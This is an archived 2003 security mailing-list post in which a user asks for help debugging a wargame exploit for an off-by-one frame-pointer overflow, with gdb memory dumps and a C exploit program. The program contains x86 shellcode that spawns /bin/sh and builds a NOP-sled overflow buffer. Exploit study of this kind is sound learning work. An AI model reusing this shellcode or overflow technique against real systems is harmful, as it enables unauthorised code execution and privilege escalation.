Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

Illegal Instruction and Frame pointer overwriting

From: joe <moj0e () terra com br>
Date: Wed, 24 Sep 2003 09:19:14 -0300
Hello! It is great to such a mailing list as this! It's not too hot and not too cold!! Its just right!! 
Anyway...
I am having a problem developing an exploit for a wargame.
The vuln is just like the one on:

http://www.phrack.org/phrack/55/P55-08
I even use the exploit provided since the vuln is almost identical to the one on the wargame. I am able to overwrite the last byte on EBP (I realize it adds 4 to it) and make it point to an address that will take me to the NOPS. From there it travels up the memory untill it hits a certain address and causes an ILLEGAL INSTRUCTION (at least it doesn't segfault). 

It tries to execute
instruction 0xf798bfff   which looks doesnt look right to me.
(I am using Mandrake 9.1 on a x86) The vuln was compiled with gcc v2.9 or something... the one that makes it possible to exploit this kind of vuln. I am able to check execution flow by examining the memory (using the command x in gdb). 
So I know that I am actually going to where I want (or think I want) to go.

Any help is gratefully accepted! Attached is the exploit

Here is some gdb output for you to chew on:

(no debugging symbols found)...
(gdb) run `./xp15`
Breakpoint 1, 0x08048555 in main ()
(gdb) info reg esp
esp            0xbffff78c       0xbffff78c
(gdb) x 0xbffff78c
0xbffff78c:     0xbffff710
(gdb) x 0xbffff710
0xbffff710:     0x90909090
(gdb) c
Continuing.

Program received signal SIGILL, Illegal instruction.
0xbffff776 in ?? ()
(gdb) x 0xbffff776
0xbffff776:     0xf798bfff
(gdb) x/100 0xbffff700
0xbffff700:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff710:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff720:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff730:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffff740:     0x90909090      0x90909090      0x90909090      0x24eb9090
0xbffff750:     0x891e8d5e      0xd2330b5e      0x89075689      0x1bb80f56
0xbffff760:     0x35123456      0x12345610      0x4006d57d      0x40155f50
0xbffff770:     0x40012780      0xbffff804      0xbffff798      0x40077eb2
0xbffff780:     0x40154360      0x08048660      0xbffff7a4      0xbffff710
0xbffff790:     0x88888888      0x40155f50      0xbffff788      0x08048551
0xbffff7a0:     0x08048660      0xbffff804      0xbffff7b8      0x400508d9
0xbffff7b0:     0x40031038      0x40155f50      0xbffff7d8      0x4003b7f7
0xbffff7c0:     0x00000002      0xbffff804      0xbffff810      0x40012c10
0xbffff7d0:     0x00000002      0x08048380      0x00000000      0x080483a1
0xbffff7e0:     0x080484b0      0x00000002      0xbffff804      0x080482e0
0xbffff7f0:     0x08048590      0x4000abf0      0xbffff7fc      0x40012de0
0xbffff800:     0x00000002      0xbffff947      0xbffff961      0x00000000
0xbffff810:     0xbffffa63      0xbffffa76      0xbffffa85      0xbffffa96
0xbffff820:     0xbffffaa8      0xbffffac0      0xbffffacb      0xbffffadb
0xbffff830:     0xbffffae9      0xbffffb03      0xbffffb14      0xbffffb1d
0xbffff840:     0xbffffcfb      0xbffffd0e      0xbffffd1c      0xbffffd3c
0xbffff850:     0xbffffd67      0xbffffd80      0xbffffdfb      0xbffffe0d
0xbffff860:     0xbffffe19      0xbffffe35      0xbffffe44      0xbffffe5c
0xbffff870:     0xbffffe6d      0xbffffe82      0xbffffe9d      0xbffffed2
0xbffff880:     0xbffffedd      0xbffffef2      0xbfffff09      0xbfffff11
(gdb)
(gdb)quit
[blurb@wargame]$ fortune
"The major difference between a thing that might go wrong
and a thing that cannot possibly go wrong is that when a
thing that cannot possibly go wrong goes wrong it usually
turns out to be impossible to get at or repair."

-- One of the laws of computers and programming revealed.
[blurb@wargame]$

        #include <stdio.h>
        #include <unistd.h>

        char sc_linux[] =
  /*"\x31\xdb"                   
  "\x89\xd8"                   
  "\xb0\x17"                   
  "\xcd\x80"                 
  "\x31\xdb"                   
  "\x89\xd8"                   
  "\xb0\x2e"                 
  "\xcd\x80"                  
  "\x31\xc0"                   
  "\x50"                       
  "\x68\x2f\x2f\x73\x68"       
  "\x68\x2f\x62\x69\x6e"        
  "\x89\xe3"                   
  "\x50"                       
  "\x53"                        
  "\x89\xe1"                    
  "\x31\xd2"                    
  "\xb0\x0b"                   
  "\xcd\x80"                   
  "\x31\xdb"                   
  "\x89\xd8"                  
  "\xb0\x01"                   
  "\xcd\x80";                   */
//      /*Original shell code....
                "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07"
                "\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"
                "\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8"
                "\xd7\xff\xff\xff/bin/sh";
        
        main()
        {
                int i, j, t;
                char buffer[1024];

                bzero(&buffer, 1024);
                for (i=0;i<=(252-sizeof(sc_linux)-20);i++)
                {
                        buffer[i] = 0x90;
                }
                for (j=0,i=i;j<(sizeof(sc_linux)-1);i++,j++)
                {
                        buffer[i] = sc_linux[j];
                }
                
                for(t=0; t < 4;t++ ){
                buffer[i++] = 0x10; //
                buffer[i++] = 0xf7; // Address of our buffer
                buffer[i++] = 0xff; // 
                buffer[i++] = 0xbf; // 
                }
                
                for(t=0; t < 9; t++) { 
                        buffer[i++] = 0x88; // overflowchar
                }
                
                printf("%s",buffer);
                //execl("./15", "./15", buffer, NULL);

        }
Previous By Date Next
Previous By Thread Next

Current thread: